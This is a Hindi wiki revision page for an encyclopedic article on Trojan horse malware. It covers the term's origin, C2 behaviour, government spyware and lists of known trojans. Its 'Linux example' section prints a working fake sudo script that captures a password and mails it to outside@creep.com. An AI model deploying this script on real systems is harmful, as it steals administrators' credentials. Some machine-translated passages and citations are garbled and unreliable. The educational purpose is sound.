ट्रोजन हॉर्स (कंप्यूटिंग): Difference between revisions
No edit summary |
No edit summary |
||
Line 10: | Line 10: | ||
}}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।| access-date = 2012-04-05| url = http://www.anvari.org/fortune/Miscellaneous_Collections/291162_trojan-horse-coined-by-mit-hacker-turned-nsa-spook-dan-edwards-n.html}}</ref> | }}</ref><ref>{{Cite web| title = ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।| access-date = 2012-04-05| url = http://www.anvari.org/fortune/Miscellaneous_Collections/291162_trojan-horse-coined-by-mit-hacker-turned-nsa-spook-dan-edwards-n.html}}</ref> | ||
ट्रोजन सामान्यतः [[सोशल इंजीनियरिंग (सुरक्षा)]] के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक [[ईमेल]] | ट्रोजन सामान्यतः [[सोशल इंजीनियरिंग (सुरक्षा)]] के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक [[ईमेल]] संलग्नक निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप [[पिछले दरवाजे (कंप्यूटिंग)]] के रूप में कार्य करते हैं, | ||
एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref>{{cbignore|bot=InternetArchiveBot}} [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं। | एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।<ref>{{cite web |title=वायरस, वर्म और ट्रोजन के बीच अंतर|url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}</ref>{{cbignore|bot=InternetArchiveBot}} [[रैंसमवेयर]] हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं। | ||
Line 20: | Line 20: | ||
== शब्द का प्रयोग == | == शब्द का प्रयोग == | ||
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले [[यूनिक्स]] मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:<ref>{{cite web |last1=Thompson |first1=Ken | last2=Ritchie | first2=Dennis M. |title=यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971|url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |access-date=28 March 2020}}</ref> | यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द, पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले [[यूनिक्स]] मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:<ref>{{cite web |last1=Thompson |first1=Ken | last2=Ritchie | first2=Dennis M. |title=यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971|url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |access-date=28 March 2020}}</ref> | ||
{{quotation |इसके अलावा, कोई भी सेट-यूज़र-आईडी बिट ऑन के साथ फ़ाइल के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य फ़ाइलों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।}} | {{quotation |इसके अलावा, कोई भी सेट-यूज़र-आईडी बिट ऑन के साथ फ़ाइल के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य फ़ाइलों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।}} | ||
Line 26: | Line 26: | ||
इसे [[केन थॉम्पसन]] द्वारा 1983 के अपने ट्यूरिंग अवार्ड स्वीकृति व्याख्यान "रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट" में लोकप्रिय बनाया गया था।<ref>{{cite journal|title = ट्रस्टिंग ट्रस्ट पर प्रतिबिंब|author = Ken Thompson|journal = Commun. ACM | इसे [[केन थॉम्पसन]] द्वारा 1983 के अपने ट्यूरिंग अवार्ड स्वीकृति व्याख्यान "रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट" में लोकप्रिय बनाया गया था।<ref>{{cite journal|title = ट्रस्टिंग ट्रस्ट पर प्रतिबिंब|author = Ken Thompson|journal = Commun. ACM | ||
|volume= 27|number = 8|pages = 761–763|date = 1984|url = https://dl.acm.org/ft_gateway.cfm?id=1283940&type=pdf|doi=10.1145/358198.358210|doi-access = free}}.</ref> | |volume= 27|number = 8|pages = 761–763|date = 1984|url = https://dl.acm.org/ft_gateway.cfm?id=1283940&type=pdf|doi=10.1145/358198.358210|doi-access = free}}.</ref> उपशीर्षक : किसी को किस हद तक एक कथन पर भरोसा करना चाहिए कि एक प्रोग्राम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मल्टिक्स की सुरक्षा पर एक रिपोर्ट से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।<ref>{{Citation|author1 = Paul A. Karger| author2 = Roger R. Schell | ||
|title = Thirty Years Later: Lessons from the Multics Security Evaluation|journal = ACSAC| date = 2002|pages = 119–126 | |title = Thirty Years Later: Lessons from the Multics Security Evaluation|journal = ACSAC| date = 2002|pages = 119–126 | ||
|url= https://www.acsac.org/2002/papers/classic-multics.pdf}}</ref><ref>Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: {{Citation|author = Ken Thompson|title = On Trusting Trust. | |url= https://www.acsac.org/2002/papers/classic-multics.pdf}}</ref><ref>Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: {{Citation|author = Ken Thompson|title = On Trusting Trust. |
Revision as of 11:31, 27 December 2022
एक श्रृंखला का हिस्सा |
कंप्यूटर हैकिंग |
---|
कम्प्यूटिंग में, एक ट्रोजन हॉर्स कोई भी ऐसा मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक उद्देश्य से भ्रमित करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ।[1][2][3][4][5]
ट्रोजन सामान्यतः सोशल इंजीनियरिंग (सुरक्षा) के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक ईमेल संलग्नक निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप पिछले दरवाजे (कंप्यूटिंग) के रूप में कार्य करते हैं,
एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।[6] रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।
कंप्यूटर वायरस और कंप्यूटर कीड़ा के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।[7]
शब्द का प्रयोग
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द, पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले यूनिक्स मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:[8]
इसके अलावा, कोई भी सेट-यूज़र-आईडी बिट ऑन के साथ फ़ाइल के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य फ़ाइलों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।
एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स कंप्यूटर सिस्टम में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना की रिपोर्ट में है।[9]
इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग अवार्ड स्वीकृति व्याख्यान "रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट" में लोकप्रिय बनाया गया था।[10] उपशीर्षक : किसी को किस हद तक एक कथन पर भरोसा करना चाहिए कि एक प्रोग्राम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मल्टिक्स की सुरक्षा पर एक रिपोर्ट से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।[11][12]
व्यवहार
एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक कमांड और कंट्रोल (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रॉक्सी के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रोजन पर कब्जा कर सकते हैं।[13]
जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए स्पाइवेयर को कभी-कभी गोववेयर कहा जाता है । गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।[14][15] गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर [16] और जर्मन "स्टेट ट्रोजन" उपनाम R2D2 शामिल है। [14]जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।[17]
हैकर्स के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। BitDefender द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।[18] बिटडिफेंडर ने कहा है कि लगभग 15% कंप्यूटर एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमण द्वारा भर्ती किए जाते हैं।[19]
लिनक्स उदाहरण
ट्रोजन हॉर्स एक कंप्यूटर प्रोग्राम है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।[20] एक आसान प्रोग्राम Linux sudo कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है /tmp ।
यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है sudo
, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है,
: # sudo # ---- # Turn off the character echo to the screen. stty -echo /bin/echo -n "Password for `whoami`: " read x /bin/echo "" # Turn back on the character echo. stty echo echo $x | mail -s "`whoami` password" outside@creep.com sleep 1 echo Sorry. rm $0 exit 0
कमांड लाइन आधारित ट्रोजन हॉर्स को रोकने के लिए, सेट करें .
में प्रवेश PATH=
पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: PATH=/usr/local/bin:/usr/bin:.
.
उल्लेखनीय उदाहरण
निजी और सरकारी
- एएनओएम - एफबीआई
- कैओस कंप्यूटर क्लब#Staatstrojaner|0zapftis / r2d2 StaatsTrojaner – DigiTask
- डार्ककॉमेट - सीआईए / एनएसए
- फिनफिशर - लेंच आईटी समाधान / गामा इंटरनेशनल
- हैकिंग टीम# उत्पाद और क्षमताएं | दा विंची / गैलीलियो आरसीएस - हैकिंग टीम
- जादू लालटेन (सॉफ्टवेयर) - एफबीआई
- 2020 यूनाइटेड स्टेट्स फेडरल गवर्नमेंट डेटा ब्रीच - फॉरेन इंटेलिजेंस सर्विस (रूस)आरामदायक भालू (संदिग्ध)
- जरूरत के हिसाब से एक्सेस ऑपरेशंस#क्वांटम अटैक|टीएओ क्वांटम/फॉक्सैसिड - एनएसए
- योद्धा गौरव - जीसीएचक्यू
सार्वजनिक रूप से उपलब्ध
- ईजीएबीटीआर - 1980 के दशक के अंत में
- नेटबस - 1998 (प्रकाशित)[21]
- मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
- पीछे का छिद्र - 1998 (प्रकाशित)
- बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
- बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
- डार्ककॉमेट - 2008-2012 (प्रकाशित)
- ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
- घोस्ट आरएटी - 2009 (प्रकाशित)
- मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)[22][23]
- Leurak द्वारा MEMZ - 2016 (प्रकाशित)
सुरक्षा शोधकर्ताओं द्वारा पता लगाया
- बारह टोटके - 1990
- क्लिकबॉट.ए - 2006 (खोजा गया)
- ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
- ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
- ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
- कोबफेस - 2008 (खोजा गया)
- चोट - 2009 (खोजा गया)
- कोरफ्लड - 2010 (खोजा गया)
- टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
- सोवा - 2022 (खोजा गया)[24]
- गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)[25][26]Cite error: Closing
</ref>
missing for<ref>
tag[27][28]
पूंजीकरण
कंप्यूटर शब्द ट्रोजन हॉर्स प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण ट्रोजन को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली मार्गदर्शिकाएँ और शब्दकोश भिन्न होते हैं, कई सामान्य उपयोग के लिए लोअर केस ट्रोजन का सुझाव देते हैं।[29][30]
यह भी देखें
- कंप्यूटर सुरक्षा
- कोयल का अंडा (रूपक) | कोयल का अंडा (रूपक)
- साइबर जासूसी
- नाचने वाले सूअर
- शोषण (कंप्यूटर सुरक्षा)
- औद्योगिक जासूसी
- फ़िशिंग
- कम से कम विशेषाधिकार का सिद्धांत
- गोपनीयता-आक्रामक सॉफ्टवेयर
- दूरस्थ प्रशासन
- दूरस्थ प्रशासन सॉफ्टवेयर
- उल्टा कनेक्शन
- दुष्ट सुरक्षा सॉफ्टवेयर
- धोखाधड़ी करने वाले
- तकनीकी सहायता घोटाला
- कंप्यूटर वायरस और वर्म्स की समयरेखा
- ज़ोंबी (कंप्यूटर विज्ञान)
संदर्भ
- ↑ Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved April 5, 2012.
- ↑ "ट्रोजन हॉर्स परिभाषा". Retrieved April 5, 2012.
- ↑ "ट्रोजन हॉर्स". Webopedia. Retrieved April 5, 2012.
- ↑ "ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा". Retrieved April 5, 2012.
- ↑ "ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।". Retrieved April 5, 2012.
- ↑ "वायरस, वर्म और ट्रोजन के बीच अंतर". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
- ↑ "वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
- ↑ Thompson, Ken; Ritchie, Dennis M. "यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971" (PDF). Retrieved March 28, 2020.
- ↑ Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
- ↑ Ken Thompson (1984). "ट्रस्टिंग ट्रस्ट पर प्रतिबिंब". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
- ↑ Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
- ↑ Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
- ↑ Crapanzano, Jamie (2003). सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स (Report). SANS Institute. Retrieved May 10, 2021.
- ↑ 14.0 14.1 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
- ↑ "अधिकतर पूछे जाने वाले सवाल". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
- ↑ Dunn, John (August 27, 2009). "स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है". TechWorld. Archived from the original on January 26, 2014. Retrieved January 10, 2021.
- ↑ "जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है". DW. Retrieved April 14, 2018.
- ↑ "बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है". BitDefender. Archived from the original on August 8, 2009. Retrieved March 27, 2020.
- ↑ Datta, Ganesh (August 7, 2014). "ट्रोजन क्या होते हैं?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
- ↑ Wood, Patrick H.; Kochan, Stephen G. (1985). यूनिक्स प्रणाली सुरक्षा. Hayden Books. p. 42. ISBN 0-8104-6267-2.
- ↑ Seth, Kulakow (1998). "क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?" (Report). SANS Institute. Retrieved May 10, 2021.
- ↑ "मेगा पैंजर". SourceForge.
- ↑ "मिनी टैंक". SourceForge.
- ↑ "सोवा वायरस क्या है?". India Today.
- ↑ "ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग".
- ↑ Neal, Dave (November 20, 2015). "शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है". The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.
{{cite web}}
: CS1 maint: unfit URL (link) - ↑ Times, Tech (November 9, 2015). "एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें".
- ↑ "एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें". November 19, 2015.
- ↑ "ट्रोजन". Collins Advanced Dictionary. Retrieved March 29, 2020.
- ↑ "ट्रोजन हॉर्स". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.
इस पेज में लापता आंतरिक लिंक की सूची
- प्राचीन यूनानी
- मिनीपैंजर और मेगापैंजर
- विदेशी खुफिया सेवा (रूस)
- एनोम
- ेगाबत्र
- घो0स्त चूहा
- बिफ्रॉस्ट (ट्रोजन हॉर्स)
- जानवर (ट्रोजन हॉर्स)
- ज़ीउस (ट्रोजन हॉर्स)
- जीरो एक्सेस बॉटनेट
- शैली गाइड
बाहरी संबंध
- Media related to Trojan horse (malware) at Wikimedia Commons
- "CERT Advisory CA-1999-02 Trojan Horses" (PDF). Carnegie Mellon University Software Engineering Institute. Archived from the original on October 17, 2000. Retrieved September 15, 2019.